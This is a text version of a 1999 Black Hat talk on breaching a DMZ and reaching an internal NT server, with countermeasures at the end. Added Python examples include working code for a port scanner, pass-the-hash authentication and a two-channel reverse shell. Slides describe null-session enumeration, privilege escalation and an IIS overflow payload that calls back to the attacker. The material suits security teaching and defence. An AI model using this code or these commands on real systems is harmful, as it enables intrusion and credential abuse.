
Over the Router, Through the Firewall, to Grandma’s House We Go


Description

Over the Router, Through the Firewall, to Grandma's House We Go. George Kurtz & Eric Schultze, Ernst & Young LLP. Session objective: discuss common DMZ and host configuration weaknesses, and demonstrate what may happen if a hacker were to exploit these weaknesses. (PowerPoint presentation, Black Hat 1999.)

Page 1: Over the Router, Through the Firewall, to Grandma’s House We Go

© 1999 Ernst & Young LLP
eXtreme Hacking
Black Hat 1999

Over the Router, Through the Firewall, to Grandma's House We Go
George Kurtz & Eric Schultze
Ernst & Young LLP

Page 2: Over the Router, Through the Firewall, to Grandma’s House We Go

Session Objective

Discuss common DMZ and host configuration weaknesses
Demonstrate what may happen if a hacker were to exploit these weaknesses
Present countermeasures to help secure the network and related hosts

Page 3: Over the Router, Through the Firewall, to Grandma’s House We Go

Network Diagram (figure; only the host addresses survive extraction): 10.1.1.20, 10.1.1.10, 172.16.1.200, 172.16.1.50, 192.168.1.20

Page 4: Over the Router, Through the Firewall, to Grandma’s House We Go

Network Design

Internet router is blocking tcp/udp ports 135-139
NT Web Server (SP3) is dual-homed
Firewall allows only outbound http (80) and smtp (25) traffic

Page 5: Over the Router, Through the Firewall, to Grandma’s House We Go

Hacker's Objective

Gain control over the internal NT server from the Internet

Page 6: Over the Router, Through the Firewall, to Grandma’s House We Go

SysAdmin's Objective

Identify holes in the environment and close them

Page 7: Over the Router, Through the Firewall, to Grandma’s House We Go

Target Selection

Ping Sweep: gping, fping
Port Scan: nmap, NetScanTools Pro 2000
OS Identification: nmap -O, queso
Banner Grabbing: VisualRoute, Netcat
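The port-scan and banner-grab steps above are what nmap and netcat do for you; the following added example (not from the deck, written for this page) shows the mechanics in a few dozen lines of Python: a TCP connect scan of each port, followed by a read of whatever the service volunteers. The target service and its "220 ... ESMTP" banner are constructed stand-ins running on loopback so the code runs offline; the host name mail.example.test is made up.

```python
import socket
import threading


def start_banner_service(banner):
    """Constructed stand-in for a target daemon: listens on loopback on an
    OS-chosen port and greets every client with `banner`, the way SMTP or
    FTP servers announce themselves. Returns (listening socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # listener closed: stop serving
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def probe(host, port, timeout=0.5):
    """TCP connect scan of one port plus banner grab (what `nc host port`
    shows before you type anything). Returns (is_open, banner); banner is
    b'' when the service waits for the client to speak first."""
    try:
        s = socket.create_connection((host, port), timeout=timeout)
    except OSError:                  # RST or timeout: closed or filtered
        return False, b""
    with s:
        s.settimeout(timeout)
        try:
            return True, s.recv(256)
        except socket.timeout:
            return True, b""


def scan(host, ports):
    """Connect-scan the given ports; map each open port to its banner."""
    results = {}
    for port in ports:
        is_open, banner = probe(host, port)
        if is_open:
            results[port] = banner
    return results


def free_closed_port():
    """Demo helper: bind and release a port so the scan has a port that is
    known to be closed right now."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    # Constructed banner; a real mail server would send its own greeting.
    srv, port = start_banner_service(b"220 mail.example.test ESMTP\r\n")
    print(scan("127.0.0.1", [free_closed_port(), port]))
    srv.close()
```

A service that stays silent until the client speaks (HTTP, for example) shows up as open with an empty banner; for those you send a request first, which is exactly the `GET /.htr HTTP/1.0` check later in the deck.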

Page 8: Over the Router, Through the Firewall, to Grandma’s House We Go

ttdb

Buffer overflow in rpc.ttdbserver (the ToolTalk database server)
Allows a remote user to execute arbitrary code
Arbitrary code may be executed that will shell back an xterm as root

Page 9: Over the Router, Through the Firewall, to Grandma’s House We Go

Netcat Redirection (figure; hosts shown: 10.1.1.20, 172.16.1.50, 172.16.1.200)

Page 10: Over the Router, Through the Firewall, to Grandma’s House We Go

Netcat Redirection

Attack Linux listens on 139 and redirects to 1139 on Sparc
Sparc listens on 1139 and redirects to 139 on NT Web Server
Attack NT issues a NetBIOS request to Attack Linux
The NetBIOS request is forwarded over the router to the NT Web Server

Page 11: Over the Router, Through the Firewall, to Grandma’s House We Go

Enumerate NT Information

Null Session: net use \\172.16.1.50\ipc$ "" /user:""
NetUserEnum (local, global, DumpACL)
NetWkstaTransportEnum (Getmac)
RpcMgmt Query (EPDump)

Page 12: Over the Router, Through the Firewall, to Grandma’s House We Go

Privilege Escalation

Plant sechole on NT Server
Execute sechole via http
IUSR account becomes admin
Add new user account (via http)
Add new user account to Administrators group (via http)

Page 13: Over the Router, Through the Firewall, to Grandma’s House We Go

IIS Buffer Overflow

Determine if server is vulnerable:
  nc 172.16.1.200 80
  GET /.htr HTTP/1.0
  Evaluate response
Crash IIS and send payload
Target server contacts our web server and downloads payload
Payload executes on server and contacts our attack host

Page 14: Over the Router, Through the Firewall, to Grandma’s House We Go

VNC

Page 15: Over the Router, Through the Firewall, to Grandma’s House We Go

Pass The Hash

Modified SMB client can mount shares (C$, etc.) on a remote NT host using only the username and password hash
No need to "decrypt" the password hash
Concept first presented by Paul Ashton in an NTBugtraq post

Page 16: Over the Router, Through the Firewall, to Grandma’s House We Go

Pass The Hash v.2

Create an admin account on our own NT host with the same name as the admin account for which we have hash values
Upload the hash values into memory on our own NT host
Perform pass-through authentication to the target host
No need to "decrypt" the password
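Both pass-the-hash slides rest on one fact: the NT challenge-response is computed from the stored hash, never from the password, so whoever holds the hash can answer the challenge. The added example below (written for this page, not part of the deck) makes that concrete. It computes the NT hash exactly as the SAM stores it (MD4 over the UTF-16LE password, with a pure-Python MD4 because OpenSSL 3 builds often refuse `hashlib.new("md4")`), then runs an NTLMv2-style challenge-response in which the "target" verifies against its stored hash and the "attacker" answers using only a dumped hash. The response computation follows the NTLMv2 HMAC-MD5 construction but with the client blob reduced to a nonce; a real client also includes a timestamp and target information, so treat the protocol side as a simplified model. Account names, the CORP domain and the passwords are constructed.

```python
import hashlib
import hmac
import os
import struct


def md4(data):
    """RFC 1320 MD4 in pure Python (NT hashes are MD4, and OpenSSL 3 often
    disables it as a legacy algorithm)."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19),
         (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = rotl((a + fn(b, c, d) + x[idx] + k) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c   # rotate registers: next step updates d, then c, then b
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password):
    """NT hash as stored in the SAM: MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16le"))


def ntlmv2_proof(nt_hash_bytes, user, domain, server_challenge, client_blob):
    """NTLMv2 response core (HMAC-MD5 keyed from the NT hash). Simplified:
    a real client's blob also carries a timestamp and target info. Note the
    input is the stored hash, not the password."""
    v2_key = hmac.new(nt_hash_bytes, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(v2_key, server_challenge + client_blob, hashlib.md5).digest()


class NtHost:
    """Target side: keeps NT hashes (as a SAM does) and checks responses.
    It stores the very value the attacker dumped, so it cannot tell
    hash-in-hand from password-in-hand."""

    def __init__(self, domain, accounts):
        self.domain = domain
        self.accounts = accounts          # user -> NT hash

    def challenge(self):
        return os.urandom(8)

    def verify(self, user, server_challenge, client_blob, proof):
        stored = self.accounts.get(user)
        if stored is None:
            return False
        expected = ntlmv2_proof(stored, user, self.domain, server_challenge, client_blob)
        return hmac.compare_digest(expected, proof)


def authenticate_with_hash(host, user, dumped_hash):
    """Attacker side: answer the challenge using only the dumped hash."""
    server_challenge = host.challenge()
    client_blob = os.urandom(8)          # client nonce (simplified blob)
    proof = ntlmv2_proof(dumped_hash, user, host.domain, server_challenge, client_blob)
    return host.verify(user, server_challenge, client_blob, proof)


if __name__ == "__main__":
    # Constructed scenario: the attacker code never sees the password string.
    target = NtHost("CORP", {"administrator": nt_hash("N0tTheP0int!")})
    dumped = nt_hash("N0tTheP0int!")     # in the deck this is what pwdump hands over
    print("hash-only logon accepted:", authenticate_with_hash(target, "administrator", dumped))
    print("wrong hash rejected:", authenticate_with_hash(target, "administrator", nt_hash("guess")))
```

This is also why cracking the hash with L0phtCrack is optional for lateral movement: cracking only matters where the cleartext itself is needed (interactive logon, or reuse against a non-NTLM service).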

Page 17: Over the Router, Through the Firewall, to Grandma’s House We Go

Network Diagram (figure; hosts shown: 10.1.1.20, 172.16.1.200, 172.16.1.50, 192.168.1.20)

Page 18: Over the Router, Through the Firewall, to Grandma’s House We Go

Shovel The Shell (figure; hosts shown: 10.1.1.20, 192.168.1.20)

Page 19: Over the Router, Through the Firewall, to Grandma’s House We Go

Shovel The Shell

Launch two Netcat listeners on Attack1a (ports 80 and 25)
Execute trojan on NT Server:
  Netcat TO port 80 on AttackLinux
  Commands typed on AttackLinux (port 80) are piped to CMD.exe on NT Server
  CMD.exe output is Netcatted TO port 25 on AttackLinux
Type commands in the 80 window, view output in the 25 window
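The procedure above is a two-channel reverse shell: both connections originate on the victim, and they use ports 80 and 25 only because those are the ports the firewall lets out. As an added example that is not from the deck, the Python below plays both sides on loopback: `shovel()` is the victim-side trojan (the `nc | cmd.exe | nc` pipeline, with the local POSIX shell standing in for CMD.exe), and `attacker_session()` is the pair of listeners. Ports are OS-chosen rather than 80 and 25 so the demo runs unprivileged; the commands fed through are constructed.

```python
import socket
import subprocess
import threading


def _listen(host="127.0.0.1", port=0):
    """Open a listener; port 0 lets the OS pick (the deck uses 80 and 25
    because those are the only outbound ports the firewall permits)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((host, port))
    s.listen(1)
    return s, s.getsockname()[1]


def shovel(attacker_host, cmd_port, out_port):
    """Victim side, the trojan from the slide: `nc attacker 80 | cmd.exe |
    nc attacker 25`. Both connections are outbound from the victim, so an
    outbound-only firewall policy does not stop them. Each newline-
    terminated command is run by the local shell and its output is sent
    back over the second connection. Deliberately executes whatever it is
    told: that is the behaviour being demonstrated."""
    cmd_conn = socket.create_connection((attacker_host, cmd_port))
    out_conn = socket.create_connection((attacker_host, out_port))
    with cmd_conn, out_conn:
        buf = b""
        while True:
            data = cmd_conn.recv(4096)
            if not data:                   # attacker closed the command channel
                break
            buf += data
            while b"\n" in buf:
                line, buf = buf.split(b"\n", 1)
                if not line.strip():
                    continue
                # The cmd.exe stage of the pipeline (here the local POSIX shell).
                proc = subprocess.run(line.decode(errors="replace"), shell=True,
                                      capture_output=True)
                out_conn.sendall(proc.stdout + proc.stderr)


def attacker_session(commands):
    """Attacker side: two listeners, commands go down one, output comes back
    on the other. Starts the victim in a thread on loopback so the whole
    exchange runs in one process. Returns everything the victim sent back."""
    cmd_listener, cmd_port = _listen()
    out_listener, out_port = _listen()
    threading.Thread(target=shovel, args=("127.0.0.1", cmd_port, out_port),
                     daemon=True).start()
    cmd_conn, _ = cmd_listener.accept()    # the "port 80" window
    out_conn, _ = out_listener.accept()    # the "port 25" window
    chunks = []
    with cmd_conn, out_conn:
        for command in commands:
            cmd_conn.sendall(command.rstrip(b"\n") + b"\n")
        cmd_conn.shutdown(socket.SHUT_WR)  # EOF: victim finishes and closes its output channel
        while True:
            data = out_conn.recv(4096)
            if not data:
                break
            chunks.append(data)
    cmd_listener.close()
    out_listener.close()
    return b"".join(chunks)


if __name__ == "__main__":
    # Constructed command list; in the deck the attacker types interactively.
    print(attacker_session([b"echo shoveled", b"echo second command"]).decode(errors="replace"))
```

From the firewall's point of view this is two ordinary outbound sessions from the internal server to "a web server" and "a mail server", which is the detection problem the Network Countermeasures slide answers with logging and intrusion detection rather than port filtering alone.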

Page 20: Over the Router, Through the Firewall, to Grandma’s House We Go

Network Countermeasures

Block ALL ports at the border routers
Open only those ports that support your security policy
Review logs
Implement network and host intrusion detection

Page 21: Over the Router, Through the Firewall, to Grandma’s House We Go

Unix Countermeasures

TTDB
  Kill the "rpc.ttdbserverd" process
  Apply vendor-specific patches
  Block low and high numbered RPC locator services at the border router

Xterm
  Remove trusted relationships with xhost -
  If sending sessions to another terminal, restrict to a specific terminal
  Block ports 6000-6063 if necessary

Page 22: Over the Router, Through the Firewall, to Grandma’s House We Go

NT Countermeasures

Block tcp and udp ports 135, 137, 138 and 139 at the router
Prevent information leakage:
  Utilize the RestrictAnonymous registry key:
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous DWORD = 1
  Unbind "WINS Client (TCP/IP)" from the Internet-connected NIC

Page 23: Over the Router, Through the Firewall, to Grandma’s House We Go

NT Countermeasures

Password composition
  7 characters is the strongest humanly usable length; 14 is the strongest (the LM hash is computed over two independent 7-character halves, so a password of 8 to 13 characters leaves a short, easily cracked second half)
  Use meta-characters within the first 7 characters of your password
Utilize account lockout
Utilize passfilt.dll to require stronger passwords
Utilize the Passprop.exe admin lockout feature

Page 24: Over the Router, Through the Firewall, to Grandma’s House We Go

NT Countermeasures

Apply current service packs and security-related hotfixes
Review the IIS security checklist: www.microsoft.com/security/products/iis/CheckList.asp

Page 25: Over the Router, Through the Firewall, to Grandma’s House We Go

Countermeasures

Disclaimer: Test all changes on a non-production host before implementing them on production servers

Page 26: Over the Router, Through the Firewall, to Grandma’s House We Go

Tools and Concepts

Visual Route: www.visualroute.com
NetScanTools Pro: www.nwpsw.com
gping, fping: www.securityfocus.com
nmap: www.insecure.org/nmap/
queso: www.apostols.org/projectz/
ttdb exploit: www.securityfocus.com
netcat: www.l0pht.com
rinetd: www.boutell.com

Page 27: Over the Router, Through the Firewall, to Grandma’s House We Go

Tools and Concepts

VMWare: www.vmware.com
NT Resource Kit: www.microsoft.com
DumpACL: www.somarsoft.com
sechole: www.cybermedia.co.in
pwdump: www.rootshell.com
L0phtCrack: www.l0pht.com
VNC: www.uk.research.att.com
modified SMB client: www.ntbugtraq.com

Page 28: Over the Router, Through the Firewall, to Grandma’s House We Go

Security Resources

www.microsoft.com/security
  Advisories
  Patches
  IIS Security Checklist

www.securityfocus.com
  Bugtraq Mailing List
  Tools, Books, Links
  Vulnerabilities and Fixes

Page 29: Over the Router, Through the Firewall, to Grandma’s House We Go

Osborne/McGraw-Hill

Hacking Exposed: Network Security Secrets and Solutions
George Kurtz, Stuart McClure, Joel Scambray
Due out September 1999

Page 30: Over the Router, Through the Firewall, to Grandma’s House We Go

Contact Information

George Kurtz: [email protected], (201) 836-5280
Eric Schultze: [email protected], (425) 990-6916
Web site: www.ey.com/security